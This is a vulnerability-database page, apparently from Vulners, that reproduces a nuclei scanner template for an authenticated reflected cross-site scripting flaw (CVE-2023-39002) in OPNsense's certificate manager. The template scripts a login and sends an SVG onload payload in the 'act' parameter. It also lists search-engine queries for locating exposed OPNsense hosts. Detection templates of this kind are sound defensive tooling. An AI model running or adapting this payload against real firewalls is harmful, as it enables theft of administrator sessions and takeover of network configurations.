Lucene search
K

OPNsense - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

A XSS vulnerability in OPNsense before 23.7 allows execution of arbitrary web scripts or HTML via crafted payloa

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-39002
9 Aug 202319:15
attackerkb
Circl
CVE-2023-39002
9 Aug 202322:15
circl
CNNVD
Deciso OPNsense Cross-Site Scripting Vulnerability
9 Aug 202300:00
cnnvd
CVE
CVE-2023-39002
9 Aug 202300:00
cve
Cvelist
CVE-2023-39002
9 Aug 202300:00
cvelist
NCSC
Vulnerabilities fixed in OPNSense
11 Aug 202300:00
ncsc
NVD
CVE-2023-39002
9 Aug 202319:15
nvd
Prion
Cross site scripting
9 Aug 202319:15
prion
Positive Technologies
PT-2023-26728 · Opnsense · Opnsense Community Edition +1
9 Aug 202300:00
ptsecurity
RedhatCVE
CVE-2023-39002
23 May 202505:43
redhatcve
Rows per page
id: CVE-2023-39002

info:
  name: OPNsense - Cross-Site Scripting
  author: Herry
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the act parameter in system_certmanager.php to steal OPNsense administrator session cookies and gain control of the firewall configuration.
  remediation: |
    Update OPNsense to version 23.7 or later that properly sanitizes the act parameter in system_certmanager.php and encodes output to prevent XSS attacks.
  reference:
    - https://logicaltrust.net/blog/2023/08/opnsense.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39002
    - https://github.com/opnsense/core/commit/a4f6a8f8d604271f81984cfcbba0471af58e34dc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39002
    cwe-id: CWE-79
    epss-score: 0.01162
    epss-percentile: 0.63352
    cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: opnsense
    product: opnsense
    shodan-query:
      - title:"OPNsense"
      - http.title:"opnsense"
    fofa-query: title="opnsense"
    google-query: intitle:"opnsense"
  tags: cve2023,cve,opnsense,xss,authenticated,rce,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1

      - |
        GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - 'value=""><svg/onload=alert(window.origin)> "/>'

      - type: word
        part: header_3
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: para
        part: body
        group: 1
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true

      - type: regex
        name: value
        part: body
        group: 2
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true
# digest: 490a00463044022059e56d852f499997649ca561a415348beabefa7bbcfb87dee8810bedca28ffcf0220055160c883b1f9c1f3ee4694897a9a8ba02208ca6ffb8be6b7a9ca1cf32f3ff8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.1
EPSS0.01162
SSVC
32